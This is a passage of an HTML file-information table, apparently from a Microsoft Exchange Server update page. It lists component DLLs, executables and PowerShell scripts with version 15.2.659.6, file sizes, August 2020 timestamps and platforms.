<tr><td>Microsoft.exchange.server.storage.ha.dll</td><td>15.2.659.6</td><td>81,288</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.lazyindexing.dll</td><td>15.2.659.6</td><td>211,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.logicaldatamodel.dll</td><td>15.2.659.6</td><td>1,341,312</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.mapidisp.dll</td><td>15.2.659.6</td><td>511,872</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.multimailboxsearch.dll</td><td>15.2.659.6</td><td>47,496</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.physicalaccess.dll</td><td>15.2.659.6</td><td>873,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertydefinitions.dll</td><td>15.2.659.6</td><td>1,352,072</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.propertytag.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.rpcproxy.dll</td><td>15.2.659.6</td><td>130,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storecommonservices.dll</td><td>15.2.659.6</td><td>1,018,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.storeintegritycheck.dll</td><td>15.2.659.6</td><td>111,488</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.workermanager.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.server.storage.xpress.dll</td><td>15.2.659.6</td><td>19,336</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>15.2.659.6</td><td>60,800</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.dll</td><td>15.2.659.6</td><td>50,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicelets.globallocatorcache.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll</td><td>15.2.659.6</td><td>14,216</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.common.dll</td><td>15.2.659.6</td><td>74,112</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>15.2.659.6</td><td>8,494,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.services.ewshandler.dll</td><td>15.2.659.6</td><td>633,728</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.ewsserialization.dll</td><td>15.2.659.6</td><td>1,651,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.json.dll</td><td>15.2.659.6</td><td>296,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.messaging.dll</td><td>15.2.659.6</td><td>43,392</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.onlinemeetings.dll</td><td>15.2.659.6</td><td>233,344</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.surface.dll</td><td>15.2.659.6</td><td>178,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.wcf.dll</td><td>15.2.659.6</td><td>348,552</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>15.2.659.6</td><td>56,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.bootstrapper.common.dll</td><td>15.2.659.6</td><td>93,056</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>15.2.659.6</td><td>296,320</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.commonbase.dll</td><td>15.2.659.6</td><td>35,720</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.console.dll</td><td>15.2.659.6</td><td>27,008</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.gui.dll</td><td>15.2.659.6</td><td>114,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.parser.dll</td><td>15.2.659.6</td><td>53,640</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>15.2.659.6</td><td>75,144</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.caches.dll</td><td>15.2.659.6</td><td>142,720</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.client.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharedcache.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.sharedcache.exe</td><td>15.2.659.6</td><td>58,752</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.sharepointsignalstore.dll</td><td>15.2.659.6</td><td>27,016</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.slabmanifest.dll</td><td>15.2.659.6</td><td>46,976</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>15.2.659.6</td><td>46,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.service.exe</td><td>15.2.659.6</td><td>28,024</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.store.worker.exe</td><td>15.2.659.6</td><td>26,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.eventlog.dll</td><td>15.2.659.6</td><td>13,696</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeobjectsservice.exe</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>15.2.659.6</td><td>1,205,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>15.2.659.6</td><td>158,592</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.symphonyhandler.dll</td><td>15.2.659.6</td><td>628,104</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.syncmigration.eventlog.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.syncmigrationservicelet.dll</td><td>15.2.659.6</td><td>16,264</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.systemprobemsg.dll</td><td>15.2.659.6</td><td>13,192</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.textprocessing.dll</td><td>15.2.659.6</td><td>221,576</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.textprocessing.eventlog.dll</td><td>15.2.659.6</td><td>13,688</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.addressbookpolicyroutingagent.dll</td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>15.2.659.6</td><td>138,624</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>15.2.659.6</td><td>21,880</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.controlflow.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.faultinjectionagent.dll</td><td>15.2.659.6</td><td>22,920</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.frontendproxyagent.dll</td><td>15.2.659.6</td><td>21,376</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>15.2.659.6</td><td>212,352</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.interceptoragent.dll</td><td>15.2.659.6</td><td>98,688</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>15.2.659.6</td><td>22,920</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.dll</td><td>15.2.659.6</td><td>169,344</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.malware.eventlog.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.phishingdetection.dll</td><td>15.2.659.6</td><td>20,864</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>15.2.659.6</td><td>31,616</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>15.2.659.6</td><td>46,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.search.dll</td><td>15.2.659.6</td><td>30,088</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>15.2.659.6</td><td>53,120</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll</td><td>15.2.659.6</td><td>44,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.systemprobedrop.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.transportfeatureoverrideagent.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.cloudmonitor.common.dll</td><td>15.2.659.6</td><td>28,032</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.common.dll</td><td>15.2.659.6</td><td>457,096</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.contracts.dll</td><td>15.2.659.6</td><td>18,312</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.decisionengine.dll</td><td>15.2.659.6</td><td>30,592</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>15.2.659.6</td><td>4,183,944</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dsapiclient.dll</td><td>15.2.659.6</td><td>182,144</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>15.2.659.6</td><td>121,728</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.extensibility.dll</td><td>15.2.659.6</td><td>403,848</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.extensibilityeventlog.dll</td><td>15.2.659.6</td><td>14,728</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.flighting.dll</td><td>15.2.659.6</td><td>89,992</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.dll</td><td>15.2.659.6</td><td>88,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>15.2.659.6</td><td>68,480</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.loggingcommon.dll</td><td>15.2.659.6</td><td>63,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.monitoring.dll</td><td>15.2.659.6</td><td>430,472</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.net.dll</td><td>15.2.659.6</td><td>122,248</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.contracts.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.dll</td><td>15.2.659.6</td><td>29,064</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.protocols.httpsubmission.dll</td><td>15.2.659.6</td><td>60,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.requestbroker.dll</td><td>15.2.659.6</td><td>50,056</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.contracts.dll</td><td>15.2.659.6</td><td>33,160</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.scheduler.dll</td><td>15.2.659.6</td><td>113,032</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.smtpshared.dll</td><td>15.2.659.6</td><td>18,304</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.contracts.dll</td><td>15.2.659.6</td><td>52,096</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.dll</td><td>15.2.659.6</td><td>675,200</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.storage.management.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.agents.dll</td><td>15.2.659.6</td><td>17,792</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>15.2.659.6</td><td>487,296</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.dll</td><td>15.2.659.6</td><td>306,048</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.manager.eventlog.dll</td><td>15.2.659.6</td><td>15,752</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.migrationrpc.dll</td><td>15.2.659.6</td><td>46,464</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>15.2.659.6</td><td>1,044,352</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportsyncmanagersvc.exe</td><td>15.2.659.6</td><td>18,816</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>15.2.659.6</td><td>118,664</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>15.2.659.6</td><td>924,544</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>15.2.659.6</td><td>1,466,760</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umvariantconfiguration.dll</td><td>15.2.659.6</td><td>32,648</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.dll</td><td>15.2.659.6</td><td>41,856</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedcontent.exchange.dll</td><td>15.2.659.6</td><td>24,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesync.eventlog.dll</td><td>15.2.659.6</td><td>15,224</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.unifiedpolicyfilesyncservicelet.dll</td><td>15.2.659.6</td><td>83,328</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedpolicysyncservicelet.dll</td><td>15.2.659.6</td><td>50,040</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.antispam.dll</td><td>15.2.659.6</td><td>642,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.core.dll</td><td>15.2.659.6</td><td>186,240</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.dll</td><td>15.2.659.6</td><td>67,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.eventlog.dll</td><td>15.2.659.6</td><td>12,672</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.exchange.variantconfiguration.excore.dll</td><td>15.2.659.6</td><td>56,704</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.globalsettings.dll</td><td>15.2.659.6</td><td>27,528</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.hygiene.dll</td><td>15.2.659.6</td><td>120,712</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.protectionservice.dll</td><td>15.2.659.6</td><td>31,624</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.variantconfiguration.threatintel.dll</td><td>15.2.659.6</td><td>57,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.auth.dll</td><td>15.2.659.6</td><td>35,712</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.dll</td><td>15.2.659.6</td><td>1,054,080</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.webservices.xrm.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.wlmservicelet.dll</td><td>15.2.659.6</td><td>23,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.wopiclient.dll</td><td>15.2.659.6</td><td>77,184</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingset.signalapi.dll</td><td>15.2.659.6</td><td>17,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workingsetabstraction.signalapiabstraction.dll</td><td>15.2.659.6</td><td>29,056</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.dll</td><td>15.2.659.6</td><td>505,216</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.eventlogs.dll</td><td>15.2.659.6</td><td>14,720</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.configuration.dll</td><td>15.2.659.6</td><td>36,744</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.workloadmanagement.throttling.dll</td><td>15.2.659.6</td><td>66,432</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.fast.contextlogger.json.dll</td><td>15.2.659.6</td><td>19,328</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.filtering.dll</td><td>15.2.659.6</td><td>113,024</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.filtering.exchange.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.filtering.interop.dll</td><td>15.2.659.6</td><td>15,232</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.dll</td><td>15.2.659.6</td><td>46,976</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.activedirectoryconnector.eventlog.dll</td><td>15.2.659.6</td><td>15,744</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Microsoft.forefront.filtering.common.dll</td><td>15.2.659.6</td><td>23,936</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.diagnostics.dll</td><td>15.2.659.6</td><td>22,400</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.filtering.eventpublisher.dll</td><td>15.2.659.6</td><td>34,696</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.forefront.management.powershell.format.ps1xml</td><td>Not applicable</td><td>48,902</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.management.powershell.types.ps1xml</td><td>Not applicable</td><td>16,278</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.dll</td><td>15.2.659.6</td><td>1,518,984</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.monitoring.activemonitoring.local.components.messages.dll</td><td>15.2.659.6</td><td>13,184</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Microsoft.forefront.monitoring.management.outsidein.dll</td><td>15.2.659.6</td><td>33,160</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.forefront.recoveryactionarbiter.contract.dll</td><td>15.2.659.6</td><td>18,296</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.common.dll</td><td>15.2.659.6</td><td>46,456</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.forefront.reporting.ondemandquery.dll</td><td>15.2.659.6</td><td>50,568</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.collections.dll</td><td>15.2.659.6</td><td>72,576</td><td>12-Aug-2020</td><td>21:27</td><td>x86</td></tr><tr><td>Microsoft.isam.esent.interop.dll</td><td>15.2.659.6</td><td>541,576</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.managementgui.dll</td><td>15.2.659.6</td><td>133,504</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.mce.interop.dll</td><td>15.2.659.6</td><td>24,448</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.audit.dll</td><td>15.2.659.6</td><td>124,800</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.client.discovery.unifiedexport.dll</td><td>15.2.659.6</td><td>593,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.common.ipcommonlogger.dll</td><td>15.2.659.6</td><td>42,360</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.core.dll</td><td>15.2.659.6</td><td>217,992</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.dll</td><td>15.2.659.6</td><td>854,912</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.console.extensions.dll</td><td>15.2.659.6</td><td>485,768</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.core.dll</td><td>15.2.659.6</td><td>413,056</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.compliance.ingestion.dll</td><td>15.2.659.6</td><td>36,224</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.exchange.dar.dll</td><td>15.2.659.6</td><td>84,856</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.compliancepolicy.platform.dll</td><td>15.2.659.6</td><td>1,782,152</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.common.dll</td><td>15.2.659.6</td><td>49,536</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoring.management.dll</td><td>15.2.659.6</td><td>27,512</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.activemonitoringlocal.dll</td><td>15.2.659.6</td><td>174,976</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office.datacenter.monitoring.activemonitoring.recovery.dll</td><td>15.2.659.6</td><td>166,280</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.office365.datainsights.uploader.dll</td><td>15.2.659.6</td><td>40,320</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.online.box.shell.dll</td><td>15.2.659.6</td><td>46,464</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>15.2.659.6</td><td>67,968</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Microsoft.tailoredexperiences.core.dll</td><td>15.2.659.6</td><td>120,192</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>19,110</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Modernpublicfoldertomailboxmapgenerator.ps1</td><td>Not applicable</td><td>29,052</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>61,116</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>30,590</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Move_publicfolderbranch.ps1</td><td>Not applicable</td><td>17,520</td><td>12-Aug-2020</td><td>21:26</td><td>Not 